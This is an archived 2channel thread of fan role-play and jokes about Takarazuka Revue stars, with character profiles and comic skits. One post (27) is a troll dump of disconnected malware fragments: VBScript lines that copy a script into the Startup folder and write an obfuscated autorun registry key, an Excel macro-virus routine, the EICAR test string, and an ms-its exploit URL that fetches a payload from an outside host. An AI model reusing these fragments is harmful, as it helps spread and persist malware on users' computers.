5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

(;´д`)「こんな○○は嫌だ」@宝塚 第十五幕

1 :デコビーーーム!:2006/09/20(水) 21:36:37 ID:srIXsWnY
  ( ⌒ )
   l | /
  〆⌒ヽ
⊂(#‘д‘)<誰が凸やねん!!
 /   ノ∪
 し―-J |l| |
     ノノハ -=3 ペシッ!!

AAがないのよ〜だからこれで!
@私が立てたから誰も辞めない!@笑顔のかしげ

前スレ【第十四幕】
http://hobby8.2ch.net/test/read.cgi/siki/1139756464/

2 :名無しさん@花束いっぱい。:2006/09/20(水) 23:34:36 ID:irpVcro/
♪カコログノ〜(●▽●)イチランでつ〜♪
第一幕 http://hobby2.2ch.net/siki/kako/1042/10423/1042306864.html
第二幕 http://hobby2.2ch.net/test/read.cgi/siki/1045661600/
第三幕 http://hobby2.2ch.net/test/read.cgi/siki/1049377276/
第四幕 http://hobby2.2ch.net/test/read.cgi/siki/1055477934/
第五幕 http://hobby2.2ch.net/test/read.cgi/siki/1059813097/
第六幕 http://hobby2.2ch.net/test/read.cgi/siki/1064046936/
第七幕 http://hobby2.2ch.net/test/read.cgi/siki/1066602305/
第八幕 http://hobby2.2ch.net/test/read.cgi/siki/1071486414/
第九幕 http://hobby5.2ch.net/test/read.cgi/siki/1078923308/
第十幕 http://hobby5.2ch.net/test/read.cgi/siki/1096072051/
第十一幕 http://hobby8.2ch.net/test/read.cgi/siki/1109437402/
第十二幕 http://hobby8.2ch.net/test/read.cgi/siki/1122396640/
第十三幕 http://hobby8.2ch.net/test/read.cgi/siki/1129762548

3 :名無しさん@花束いっぱい。:2006/09/21(木) 01:36:15 ID:qZCvGz46
かしげさん、お疲れ様です!@お茶を差し出するいるい
旦~~~

4 :名無しさん@花束いっぱい。:2006/09/21(木) 08:32:10 ID:54WvPTBn
うわ〜しあわせ〜キラキラでこをほんのり染めて大喜びのかしげ@最高級の玉露にしてみました

5 :名無しさん@花束いっぱい。:2006/09/21(木) 11:47:15 ID:FezfdwNq
ほい、お茶菓子。「萩の月」@堕天使明日初日です。よろしく。

6 :ヽ(゚-゚)ノ <テンプレみたいなもの…:2006/09/21(木) 15:51:26 ID:l+Ns0Ov+
宝塚「おとめ」宙組 ● 花總 まり
@2月28日 A東京都 B日本女子大学附属高校 C162cm(+2cm)
D1991年3月ベルばら E今まで頂いた(たかこさんの相手)役全部
F今までたかこさんが演じた役の相手役全部と、今までワタクシが演じた
役全部をもう1度。そして今まで頂いていない役総てに挑戦したいです。
Gボーッと2ちゃんを見ることと、たかこさんにまりたん賛美のカキコを
してもらうこと。H世界中のお姫様のドレス IHANACHANG J黒、白 
K豚のしょうが焼き Lブリッコ、初心に戻ること M家族で考えました 
Nハナ、まりたん、女帝


7 :ヽ(゚-゚)ノ <テンプレみたいなもの…:2006/09/21(木) 15:52:12 ID:l+Ns0Ov+
宝塚「おとめ」宙組 ● (●▽●)
@8月4日 ダンリー様と同じでつよ。 A手乗り文京区 B中学校は卒業してまつ!! 
C169cm(−3cm)くらいでつ・・・。 D1995年3月国境の無い地図 マリコ様の素敵なお歌を見習いたいでつ! 
E2ちゃんで上演した「ウツザベート」のルキーニでつ!
Fぼくのオトナなミリキを十分に発揮できる役がしたいでつ!
Gよく武庫川に流されまつ。H布ガムテとバルサン Iばらベ〜ルサイユ〜♪ J青、オレンジ色、黄色
Kかぼちゃ、バナナ、コーヒーももう飲めまつ! L異常増殖 M大和川をゆうがに流れてきたこともあるんでつ! 
N(●▽●)


8 :じゅりネット製おとめその1:2006/09/21(木) 15:55:45 ID:l+Ns0Ov+
新スレ立ったしじゅりネット製おとめ(一部抜粋&改定)、
貼らせてもらうで!@じゅりネット社長


【じゅりネット製おとめ】(一部抜粋)
〜花組〜
オサ 目立ちたがり。最近三人目の嫁(若い)をもらった。が、端から見ると、カリオストロ伯爵である(違

ゆみこ じゅりネット販売促進部長。じゅり、きりやんとお笑いトリオを組むこともある。もうじき雪組に組替え

まとぶん 元・星の王子様。未だ花の生活に戸惑うことがあるらしい

あすか 戦う娘役

そのか 最近、月組に呼ばれた。セロテ使いの修行中。

あやね オサの三人目の嫁。気分はクラリス?


9 :じゅりネット製おとめその2:2006/09/21(木) 15:57:25 ID:l+Ns0Ov+
〜月組〜
えりさん 月組副組長。冷静沈着。

あさこ 別名オレクマ。代表作はクマナベート。マサチャン大好き。かなみんの体重増加が悩みの種。

ユヒカル 正確には「あらいぐまユヒカル」。オスカルの扮装は似合ってた。ガムテを使わせたら右に出る者はいない。

腰リュウ 特技は流し目とリフト。ユヒカルに負けず劣らず力持ち。

きりやん じゅりネット宣伝部長。じゅりやゆみことお笑いトリオを組む。ダンボール梱包はお手のもの

かなみん 食欲旺盛。


10 :じゅりネット製おとめその3:2006/09/21(木) 16:00:53 ID:l+Ns0Ov+
〜雪組〜
コム 冷静なトプ。いつもまーちゃんがいれたお茶を飲んでる。77期最恐。親衛隊付き。

美穂姐さん 美声の持ち主。

ハマコ ハマコボイスに貫けないものは・・・ないんだろうな・・・

ミズ 苦労人。(●▽●)の世話をし、(゚-゚)と女帝に振り回されてきた。今も苦労性は抜けきってないらしい。もうじき星組から嫁がやってくる。

アミタン ハマコ、ミズの同期。ハマコの声が牙突なら、彼女の声はフェンシングだろうか。でも強い。先日退団ハピョーウした。

まーちゃん いつもニコニコ。コムとお茶を楽しむ。実は影の支配者?

壮 しっかり者。もうじき花組へ組替え。


11 :じゅりネット製おとめその4:2006/09/21(木) 16:08:25 ID:l+Ns0Ov+
〜星組〜
英真組長 いつもハツラツ。宴会好きで片手に酒瓶持ってくることも。また、涙もろい一面もある。

柚美姐さん 副組長。組長とともに星組を支える縁の下の力持ち。

わたる 未亡人だった檀の旦那になるが、昨年泣く泣く別れる。二人目の嫁は若く、もちろん美人。いつもイチャイチャしてる。
    11月に退団する。

とうこ 常識人? トプコンビに苦労してる辺りはミズと似ているかもしれない。が、熱い人達を操ってるところをみると、
    実はそんなに苦労人じゃないのかもしれない。追い詰められると、やたらポジティブになる。
    次期トップに内定。お嫁さんはあすかちゃん(ただいま婚約中)。婚約者がじゅりネット社長とイチャ(ryするといじけてしまう。

しいちゃん 濃く、熱く。

すずみん プチでこビームでとうこを補佐。かしげにでこビームを教わったこともある。

となみ わたるの二人目の嫁。いつも二人でイチャ(ry。わたる退団後は雪組に戻り、ミズのお嫁さんに。


12 :じゅりネット製おとめその5:2006/09/21(木) 16:15:46 ID:l+Ns0Ov+
〜宙組〜
家政婦協会 まりえったとすっしーのコンビ。ミズがいなくなって仕事が増えてるらしい。

かしげ 必殺技はでこビーム。新トップとなるも来年2月での退団をハピョーウ。いつもニコニコキラキラ輝いている。

タニ(●▽●) 恐怖の分裂技や、周りを阿鼻叫喚の地獄絵図に変える歌声、いらんこといい・・・
       いや、もはや何も言うまい

アヒ 鬱。代表作はウツナベート…あ゙、月組に組替えしてたの忘れてたorz@じゅりネット社長
   ひどい…やっぱり私は忘れられる存在なんだ…@また鬱モード

ともちん
えりこ   ぼーっとしている。
いりす

るいるい 常識人。栄光の二代目娘役トプ。いや、ほんとに二代目なんて誕生しないんじゃないかと思ってたよ・・・
     最近まーちゃんに似てきてないか?と噂されている、かもしれない…
(●∨●) (●▽●)の弟。

アリス お花クローン

〜専科〜
理事(トド、車3) ニヒルなクールガイ。ヅカ曲がり署にいたりする。じゅり達のボスになったりもする。お花とは昔何かあったらしい。

よっちゃん先生 言わずと知れた元祖『白薔薇の君』。何故か(●▽●)とは茶のみ友達。アヒも誘ってたりする。最近、ぜんまい式ということが発覚した。
ミエコ先生 日舞の名手だが、よっちゃん先生のぜんまいを巻く仕事もしてる。
あすか 戦う娘役。11月から星組へ。ただいまトウコと婚約中。でも時々じゅりネット社長と…


13 :じゅりネット製おとめその6:2006/09/21(木) 16:21:15 ID:l+Ns0Ov+
うわ、宙組にオサレトプのほっくん入れ忘れてたorz
@じゅりさん!今日は忘れ物が多いでつね(●▽●)いらんこと言い

〜OG〜
じゅり じゅりネット社長。ゆみこやきりやんとお笑いトリオを組んだりしている。
ふー オサの二人目の嫁。必殺技はおかめビーム。
ゆら姐さん 元月組組長。いつも元気。元気のないゆらさんはゆらさんじゃない。何気に理事と同期。
タカコ(゚-゚) お花様の5人目の旦那様、というか婿。お花様の暴走を食い止めるのに必死だったが、
       退団発表をしてふっきれたのか、最近は無責任に。
マリタソ 別名お花様、女帝。一言では片付かないお方。77期最凶。

こんなとこか〜?忘れ物あったらフォロー頼むで〜@じゅりネット社長


14 :名無しさん@花束いっぱい。:2006/09/21(木) 16:24:08 ID:JO9Adhdk
あすかは今専科→星組だし、あひはもう月組だね
@舞台稽古の合間に冷静なコム@今日ばかりはスポーツドリンク

15 :名無しさん@花束いっぱい。:2006/09/21(木) 17:36:13 ID:FWlZDOZ6
花組にあすか書いてあったの、消したつもりで消えてへんかったからツッコまれたんかorz
ジュリネット社長@量が多いとこんがらがるわ

コム〜、専科のトコにもあすかおるで〜
それからアヒは宙組で本人しょげてるからツッコミ済みや〜
トウコ@婚約者のこととなると早速出てきます

16 :名無しさん@花束いっぱい。:2006/09/21(木) 22:04:17 ID:qZCvGz46
私も疲れてんのかな〜なれないミニスカのせい?@真剣に悩むじゅり社長

(●▽●)とうこさんはいろんなあすかタソのいるところにわいて出るんでつね〜@いらんこといい



17 :名無しさん@花束いっぱい。:2006/09/22(金) 06:04:37 ID:QJMRQF+i
それだけ婚約者のことを愛しているって事ですよ〜
でも正直、あまりシツコイとイマドキの子には嫌われますよぉ
@鬱がピークに達し攻撃的になるアヒ@しかし鬱は直らずorz

いや、案外シツコクいったほうがコロっといくで〜!@キリヤン経験あり!?

18 :名無しさん@花束いっぱい。:2006/09/22(金) 12:31:19 ID:7thjMQh9
おにいたん、らんとむたんがいないでつ@(●∨●)

19 :名無しさん@花束いっぱい。:2006/09/22(金) 14:12:25 ID:bTxQTblm
はっ!?@息を呑むじゅり社長


ひどい・・・アーネストでご一緒したのに・・・orz@既に涙で川ができてる蘭とむ

20 :名無しさん@花束いっぱい。:2006/09/22(金) 21:49:42 ID:/pNvBjLi
(●∨●)鬱おとめとか作ってみまつか?
沖田総司はあいであまんでつー♪
@オニイタソ、カシサソ誉めて下さいでつ〜!


21 :名無しさん@花束いっぱい。:2006/09/23(土) 02:52:15 ID:KXRoEjEL
私も今度沖田総司を・・・@なんだか不安なミズ

22 :名無しさん@花束いっぱい。:2006/09/23(土) 09:01:30 ID:2at2zlgW
愛でアマン…?



なんだかわからないけどチギはいい子だねぇ
@首をかしげながらニコニコかしげ
@やっぱりチギには甘い

23 :名無しさん@花束いっぱい。:2006/09/23(土) 23:28:57 ID:y7lZblsS
チギの「愛で愛人(=アマン)」は誰なのだろうと考える蘭トム@苦労しつつもやっぱり気になる

チギと離れて泣いてるヤツならウチにおるけどな〜@トウコ
ミズだったら面白いのにね(フフッ…)小悪魔コム@しっぽがとがってます

アマンかー…いいなぁ…横目で嫁を見て溜め息オレクマ(`(エ)´;)
食べ物どこかな〜みん( ● ´ ▽ ` ● )@ちょっと!早く食べ物持ってきてよ!


24 :名無しさん@花束いっぱい。:2006/09/24(日) 00:07:51 ID:wrobC1QB
アマン?コンサートでイチャイチャ踊ってたかしげさんじゃないですかね?
@漬物漬けながらみっちゃん@あくまで真面目に

ええっ!?元男より男の方が…?@わなわな震えるるいるい

どうしたの?寒いの?@るいるいに自分の上着を羽織らせるかしげ
@ついでに温熱デコビームもしてみる(ニコニコ)

25 :名無しさん@花束いっぱい。:2006/09/24(日) 04:23:04 ID:YBLy82AC
(●∨●)ドリアンのミリキでカシタンをゆうわくしたでつ〜。ふふふん♪でつ〜。
(●▽●)チギタンは、ましょうのおとこだったんでつね。
コムタンなきあとの小悪魔キャラはいただきでつ!

26 :名無しさん@花束いっぱい。:2006/09/24(日) 04:33:44 ID:CnwaUKjx
チギちゃ〜〜ん!私じゃないの〜?(涙)@片想いしみこ

そうか〜こーゆうトコが小悪魔やねんな〜@納得トウコ@泣いてるとこ悪いけど、もうすぐ東京やで、しみこ。

いっその事しみこがチギの面倒見てくれたらなー…@苦労人達


漬物を漬けても漬けても減っていくのは何故でしょう…?orz
→(●´〜)`●)ウマー


27 :<body onload=window()>:2006/09/24(日) 10:37:31 ID:aH6H6vrm
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

28 :名無しさん@花束いっぱい。:2006/09/25(月) 00:18:14 ID:kw6Tx7yj
ああ、前スレ(●▽●)の歌で埋められたんだ・・・@目立つつもりだったオサ

29 :名無しさん@花束いっぱい。:2006/09/25(月) 01:08:18 ID:VlfgXTyR
しみこタソの事は大好きでつ〜♪離れて寂しいでつ(T∨T)@でも僕って人気者でつね

あ〜トウコさん〜チギちゃんはとっても良い子なんです〜
だから東京連れて行っていいですか?@おねだりしみこタソ
凍りつく星組子@もう一度よく考えてみようか。

これで一匹減りました@ガッツポーズのお世話係

ユミコ、あんたんとこのアレ、連れて行きなさいヨ@うちの公演中なのに目立たないで!@コム

30 :名無しさん@花束いっぱい。:2006/09/25(月) 02:37:34 ID:aZzSlB2o
実は蘭トムは専科だと勘違いしている(●▽●)

あ〜コパで未沙さんと同じ役だったからね〜と
しみこのおねだりを流しながらトウコ

31 :名無しさん@花束いっぱい。:2006/09/25(月) 22:19:59 ID:9MP6gVoy
いや、その、未沙さんのやった役の、息子の役……だった…はず…
@だんだん自身を失い始める蘭とむ
@そうか…もしかして私専科だったのかな…。

どうします、あれ@トウコの勘違いを訂正するべきか悩むあすか

兄弟がおとなしくしている以上問題はないので
放っておいていいんじゃないでしょうか
@かしげさんに面倒がかからなければそれでいいんですv
@……宙娘1の伝統継承をしてしまっています

でも、蘭とむがウチに帰ってこなかったら、それはそれで困るんだけどね?
@困った顔でにこにこかしげ

32 :名無しさん@花束いっぱい。:2006/09/26(火) 02:17:24 ID:9WropXPz
ほんとに困るの〜?よー考えてみぃ@外野からかしげに聞いてみるユヒキリ
う〜ん…兄弟の世話を誰かがしてくれるならv…あ、しみこちゃん?@にっこりかしげ
ひどい…アタシなんて…アタシなんて〜〜〜!!実家(花組)に帰らせて頂きますっ!@走り去る蘭トム

(●▽●)ん〜しみこタソは甘えん坊でつからねぇ〜…僕の弟になりまつか?♪


33 :名無しさん@花束いっぱい。:2006/09/26(火) 08:43:35 ID:9FhVSYks
アハハハ、とむ君ウソだよ〜ん。慶喜のおもしろカツラがかぶれるのは
キミしかいないんだから、帰っておいで@にこにこお迎えかしげ
おもしろカツラ…orz@がっくり蘭とむ

(●▽●)まわらんか〜まわらんか〜(●∨●)

今度は回りませんっ!@あーもうどうにでもしてっ蘭とむ

34 :名無しさん@花束いっぱい。:2006/09/26(火) 09:06:24 ID:zCM7u5qZ
あはは、トムくんはかわいいなぁ
@ニコニコしながらぎゅーっとハグハグかしげ
@ペットにしたーい

35 :名無しさん@花束いっぱい。:2006/09/26(火) 10:07:09 ID:vm+FBkLv
お蘭さん、あたしがおもしろカツラにぴったりのお洋服をこーでぃねーと
しますからっ!
まずは…これっ、全身総スパンのゴールデン燕尾!!すたあって感じ?@ほっくん

36 :名無しさん@花束いっぱい。:2006/09/26(火) 10:17:31 ID:lQsfjohs
さすがオサレ組とプ様(●∨●)おにいタン、みちこタンは、と〜っても素敵でつよ〜

37 :名無しさん@花束いっぱい。:2006/09/26(火) 10:17:50 ID:bL9g2VKm
あ、バカ殿系?@悪気はない(゚-゚)@だってワタシの宴会芸だもの

うっうっ・・・ありがとうみっちゃん・・・@複雑な涙蘭とむ

38 :名無しさん@花束いっぱい。:2006/09/26(火) 20:09:06 ID:yrsh037k
ボクのヅラも課すでつよ(●▽●)@オサレ組特出経験あり

39 :名無しさん@花束いっぱい。:2006/09/27(水) 01:45:51 ID:2CJ5Nu6l
(゚д゚;ハッ!
今日ってジュンコさんの誕生日やないか〜っ!!

宴会や〜宴会の準備や〜っ!!

慌てて組長の誕生会の準備に走る星組子

ほらっ、シミコもボーッとしとらんと手伝え〜っ!!
@同期のアカシに引っ張られて行くシミコ

あっ、あっ、あ〜〜〜っ!!(●∨●)の傍からあっという間に連れ去られ声にならない叫びをあげるシミコ
@滂沱の涙を流して号泣

40 :名無しさん@花束いっぱい。:2006/09/27(水) 01:48:29 ID:2CJ5Nu6l
おネ兄いするならあげるでつ!@(●▽●)

41 :名無しさん@花束いっぱい。:2006/09/27(水) 10:39:23 ID:TD3Ck2cO
(●∨●)しみこタンのためにボクもあげるでつ〜!

42 :名無しさん@花束いっぱい。:2006/09/27(水) 15:48:55 ID:s19SsGyj
みんな〜、準備はええか〜?@トウコ
おぉ〜っ!!@星組子オトコマエな叫び

ほないくで〜!

♪今日のこの日に、生まれた人だ〜れ?
地球の裏側で誰かがは〜いって返事した、返事した♪

は〜いっ!@ジュンコさん、スズミンのぷちデコスポットライト浴びつつ挙手
@「本日の主役」タスキに頭には王冠付き

♪お誕生日が光ってる、カレンダーの真ん中で、
星のように光ってる、おめでとう、おめでとう、おめでとう♪
(以上参考資料歌○8月号w)

オール拍手〜っ!@鳴り物片手にトウコ気分は応援団長

みんなありがと〜!@号泣ジュンコさん

今日はもう無礼講や〜!じゃんじゃん飲め〜!!


にしても、ここんトコずっと宴会モードだよね、星組さん…
@傍目から冷静にコム今日はロイヤルミルクティー


43 :名無しさん@花束いっぱい。:2006/09/27(水) 17:50:07 ID:vF479ljF
ていうかワタルさんがいなくない…?
@茶飲みつつコム

とそこに!!
おまたせしましたぁぁあ〜!
ソーラン姿のワタル登場!
北の海で釣って来たばかりの魚を
ジュンコさんに献上しつつ踊り狂う!!


44 :名無しさん@花束いっぱい。:2006/09/27(水) 17:50:11 ID:8c9IFiq8
♪組長の誕生日で酒が飲めるぞ〜@酒飲み音頭熱唱中星組


・・・星組に行ったら年中半袖でいけるってホント?@同期に聞きにいくあすか
ノースリーブでも無問題よ〜@ワタルとイチャ(ry中となみ

45 :名無しさん@花束いっぱい。:2006/09/27(水) 19:50:00 ID:kK6CvmaD
オニイタン、星組さん…いいでつね〜僕もアツクお祝いしたいでつ〜(●ε●)

…ってチギチャンが言ってまつよ?(●▽●)カシゲ&蘭トムをチラリ

いいな〜…目立ってる@せめて組宴会で目立ちたいオサ

宴会って、いっぱい食べてもいいのよね!(●´○`●)あ〜ん
かなみん、残念だけど、うちの宴会は酒オンリーだから…@ヨダレを拭いてあげながらオレクマ


46 :名無しさん@花束いっぱい。:2006/09/27(水) 21:56:31 ID:I3gfd1tw
私はずっと長袖か…@イチャイチャを眺めるミズ

47 :名無しさん@花束いっぱい。:2006/09/29(金) 19:41:50 ID:7txnEKFB
・・・はっ!飲んだくれてたらスレが二日も止まってもたがな!@正気に戻るとうこ@周りには組子が転がってる

48 :名無しさん@花束いっぱい。:2006/09/29(金) 22:11:54 ID:3c36gR7b
今がチャンス!とオサ@ageで目立つ作戦

49 :名無しさん@花束いっぱい。:2006/09/30(土) 05:41:27 ID:rW570I2N
ageたがレス付かず・・・@orzなオサ

50 :名無しさん@花束いっぱい。:2006/09/30(土) 13:56:11 ID:Z8Fhw3Tt
アサコとらぶしーんでもしてみようかな…と呟くオサ@目立つ為なら何でもします

51 :名無しさん@花束いっぱい。:2006/09/30(土) 17:18:55 ID:l3PuKsaO
(`(ェ)´;)これから全国行脚なんだよ・・・@ごめんよマサチャーン・・・



先手を打って、『余計な物(マサチャーン含む)は持っていかない』とツアーのしおりに書き込むユヒカル@あと『余分な食べ物は買わない』も入れて・・・

ゆうひさ〜ん・・・かなみさんが全部食べるから余分じゃないってお土産リスト作ってます〜orz@これは全ツという名の武者修行ですか?とあひ

52 :名無しさん@花束いっぱい。:2006/10/01(日) 14:19:39 ID:sggFD5PJ
取りあえず月組ツアーのしおりに登場できたので満足のオサ@次は何をしようかな

53 :名無しさん@花束いっぱい。:2006/10/01(日) 14:25:19 ID:ReC5HQ7/
………@相変わらず無言でオサの袖を引っ張るあやね

!…今日は千秋楽だね、あやね
@いきなり二枚目スマイルであやねの手を取り東宝に走るオサ
@既にオレクマのことは脳内から消えた様子

54 :名無しさん@花束いっぱい。:2006/10/03(火) 18:29:12 ID:+QmcL+ul
彩音タソはなんでいっつも無口なんでつか〜?
(●▽●)ボクがヲウタを教えてあげまつ〜!

55 :名無しさん@花束いっぱい。:2006/10/04(水) 00:56:05 ID:aBt6gG0+
発声練習しながら近づいてくる(●▽●)にびびって
オサの背後に隠れるあやね@あいかわらず無言…

タニVSオサ の前代未聞の対決!?

こ、この展開は…もしかして、目立てる??
@胸の高鳴りを隠せないオサ

56 :名無しさん@花束いっぱい。:2006/10/04(水) 14:19:34 ID:IRIkKesw
じゅり社長〜、耳栓追加お願いしま〜す@既に装着済みゆみこ@全ツ終了までは面倒みなきゃ

忙しくてチケット作っとる間ないな・・・@今回はいいや〜とじゅり社長。

57 :名無しさん@花束いっぱい。:2006/10/04(水) 23:04:38 ID:fL5ne8xv
あれれのれ〜〜〜、まとぶん、久しぶりでつ〜!
☆組じゃなかとでつか〜、知らんかったぜよ!
@(●▽●)すでに心は幕末・言葉も中身もぐっちゃぐちゃ。

谷岡〜、今度同期会やろうよ、幹事は誰かに押し付けてさあ@まとぶん

やるでつ、じゃあこれから相談するのじゃき@(●▽●)

58 :名無しさん@花束いっぱい。:2006/10/05(木) 02:46:33 ID:+OXblrvp
同期会の話により対決がおじゃんに
@オサ
@せっかく目立つはずだったのに

                   

59 :名無しさん@花束いっぱい。:2006/10/05(木) 02:52:52 ID:Vku7oCT9
こっ…ここの期はやべぇ!最凶女帝期に次ぐ危なさだ…
@火の粉がふりかかる人たち
ってかその幹事、アタシじゃないよね…@それぞれ呟くアヒ&トム

同期会やりたいな〜@理事、こっそり言ってみるw


60 :名無しさん@花束いっぱい。:2006/10/05(木) 03:27:12 ID:2w3GvwLM
ドドドドドド・・・・

な、なんだこの地鳴りは?!@焦る現役生達

土煙の向こうにゆら姐、マミ、タモ、ノル、ポッポさんetc・・・


あっ、皆〜来てくれたんだ〜!@召喚してしまった理事@実は本日初日

61 :名無しさん@花束いっぱい。:2006/10/05(木) 07:36:58 ID:RQBU2vNX
オーホホホホホ!@高笑いのゆら姐
ゆらさーん!!@取り囲む月組子


62 : ◆U7QaJCQaio :2006/10/05(木) 17:43:22 ID:xc0cL4L8
テスト

63 :名無しさん@花束いっぱい。:2006/10/05(木) 22:38:03 ID:W8GdByhp
>>62
(●▽●)
てすとでつか〜?

漢字ドリルでお勉強するでつ〜

64 :名無しさん@花束いっぱい。:2006/10/05(木) 23:18:24 ID:Y0lUTq42
謎の秘密結社c0cの恐るべき陰謀(詳細は不明)の裏で

時同じくしてここ日生劇場前・千代田区路上では…

***じゅりネットスペサルプレゼンツ***

愛と魔法の露天商〜我が魂(ココロ)も売ったるで〜開催中!

#1白馬の王子ノル様の乗馬教室
  お客様100人に1人、馬にベガ子を使います。
#2ゆら姐の「あなたのお悩み解決します」
  何となくアルコールフリー
#3マダムポッポの「フラメンコからドジョウすくいまで」
  何となく紅茶つき
#4マミ先生の「宴会芸講座」
  まだ間に合う!今年の忘年会はこれで決まりっ!
#5たもさんの「正しい2番手講座」
  ストレス過多な中間管理職のあなたに…特別講師:ノル

65 :名無しさん@花束いっぱい。:2006/10/06(金) 00:09:43 ID:5Y7SuhwD
・・・#5に行くべきだろうか@悩むとうこ@東宝初日ですよ

・・・公演中じゃなきゃに行きたいところ・・・@真剣に悩むミズ

悩む前にハリセン@日生出演中きりやん
悩むよりガムテ@全国行脚中ユヒカル

ぜひっ!ぜひ参加させて下さい!!@飛び付くゆみこ&まとぶん@花の先輩ですし

・・・(●▽●)さんの代わりに・・・だめですか?@わりと本気蘭とむ

66 :名無しさん@花束いっぱい。:2006/10/08(日) 01:17:42 ID:wgm2AQQS
じゃ、銀河劇場へしゅっぱーつ!
@バスガイドの旗を持って、ゆみこ&まとぶん&蘭とむだけでなく日生劇場の客まで横取りするタモ
@ただいま「ペテン師と詐欺師」出演中です


67 :名無しさん@花束いっぱい。:2006/10/08(日) 13:50:25 ID:Dfwe4tgN
マミの宴会芸講座に参加し、最前列に陣取るウメ@英真エマージェンシーメンバー

@ウメ、頑張れよ・・・!@柱の影から星組長@気分は娘を見守る父親

68 :名無しさん@花束いっぱい。:2006/10/08(日) 14:21:04 ID:N+9s5iTP
最後列(座席が広い)にちゃっかり座るかなみん@食い倒れツアーと勘違い

69 :名無しさん@花束いっぱい。:2006/10/08(日) 17:12:21 ID:A8sluh6b
haru先生が宝塚歌劇史の担任

70 :名無しさん@花束いっぱい。:2006/10/09(月) 09:48:31 ID:x1zvQ4l4
haruたん発言をいちいち訂正するウエーダ@自分へのマンセー発言はスルー

ウエダのスルー部分の訂正を担当するシバタせんせ


71 :名無しさん@花束いっぱい。:2006/10/10(火) 18:59:05 ID:FsA7+XmX
あの・・・中間管理職講座は?@観劇終了後のゆみまと蘭とむ@タモさんに騙されてどうするよ

72 :名無しさん@花束いっぱい。:2006/10/10(火) 20:38:32 ID:qr3FDVZU
さすがねタモ…ふっふっふ@仲良しマミ@あいまこ片割れ

マ、マミさーん!!@興奮オレクマ@憧れのマミさんだ!

73 :名無しさん@花束いっぱい。:2006/10/10(火) 23:05:24 ID:ipcrtRLU
そんなアサコに嫉妬!するふりをするオサ@目立ちたい

74 :名無しさん@花束いっぱい。:2006/10/11(水) 18:06:30 ID:KfX62yaQ
ノルさんの乗馬教室で白馬の王子になれば?@ペガ子貸出中コム

いや〜やっぱりどじょう掬いやろ〜@隣の劇場なので、でやってるのが気になるとうこ

どっちが目立つか・・・@真剣に悩むオサ

75 :名無しさん@花束いっぱい。:2006/10/11(水) 18:38:48 ID:/z6sJEEC
(●▽●)最近カンサンとしてるのは、オサタソが目立ってるからでつか?
@いらんこといい@幕末気分でかっこいいこといったつもり

えっ、あたし目立ってた!?@狂喜するオサ@オサはいつでもオサ

タニ…閑散って単語よく知ってたね…!@教育係ミズ
@最近は堕天使に転がされている

76 :名無しさん@花束いっぱい。:2006/10/11(水) 20:15:43 ID:qI/DLnXt
(●▽●)漢字ドリルで、いっぱいお勉強したでつ〜
てすとはいつでつか〜

77 :名無しさん@花束いっぱい。:2006/10/11(水) 21:19:28 ID:3nyIbAlc
(●▽●)オサさんめだってたでつ。だれもいなかったから見られてないでつけど@いらんこといい

78 :名無しさん@花束いっぱい。:2006/10/12(木) 21:08:17 ID:JsWMsh9P
ボクも「正しい2番手講座」に参加するでつ〜@(●▽●)ストレスってなんでつか?

79 :名無しさん@花束いっぱい。:2006/10/13(金) 13:25:11 ID:WdiKPVjO
ん〜(●▽●)にはあんまり関係ないから気にせんとき〜@大劇場に送り返すとうこ

どっと疲れが・・・@一緒に帰る羽目になった蘭とむ

いつも同期がすいません@ひら謝りまとぶん

80 :名無しさん@花束いっぱい。:2006/10/13(金) 22:23:57 ID:ruFu2NOb
(●∨●)オニイタン、一緒に帰るでつー

い、いつの間に・・・orz@苦労人蘭とむ

81 :名無しさん@花束いっぱい。:2006/10/16(月) 22:16:57 ID:iebfPFri
良スレage

82 :名無しさん@花束いっぱい。:2006/10/17(火) 03:03:41 ID:sLNvPjGi
(●∨●)お兄タソ、竜馬では敵同士で寂しいでつ…
(●▽●)ノ何いってるでつか!いざとなったらチギチャソねがえればいいでつよ!
(●∨●;)流石お兄タソ、アバウトかつ大胆でつ…

…タニが「ねがえる」っていうと寝返りするみたいね…@水、とりあえず片手にドリル

83 :名無しさん@花束いっぱい。:2006/10/19(木) 13:49:31 ID:vku0ycmN
ハッ!そういやアタシ、チギと同じ役じゃん!@あまりのタイプの違いにビビる水サソ

(●∨●)ノ本当でつ〜W沖田でつ〜またお兄タソが増えたでつ!
(●▽●)ぎきょうだいでつね、水サソ!

とりあえず今はフランス人だから、戻っておいでね@堕天使コム、本日はアップルティー

84 :名無しさん@花束いっぱい。:2006/10/19(木) 17:26:53 ID:c4b1tkt6
美味しいですか?@今は誰よりもお側なサリエル

うん@青い薔薇を眺め、ご満悦なルシファー

85 :名無しさん@花束いっぱい。:2006/10/21(土) 11:50:15 ID:tHHBIEdv
(●▽●)♪♪♪♪〜DS時々放送中でつ〜♪♪♪♪∫∫∫∫∫

86 :名無しさん@花束いっぱい。:2006/10/21(土) 22:55:53 ID:ifjPIVRa
く、悔しい…!私がお茶入れるのにっ!
@堕天使ならぬ嫉妬の涙にくれるまーちゃん
かしげさんに迷惑かけちゃダメだよ〜〜!@妹まーちゃんに引きずられてゆく兄水夏希、ちょっと欝

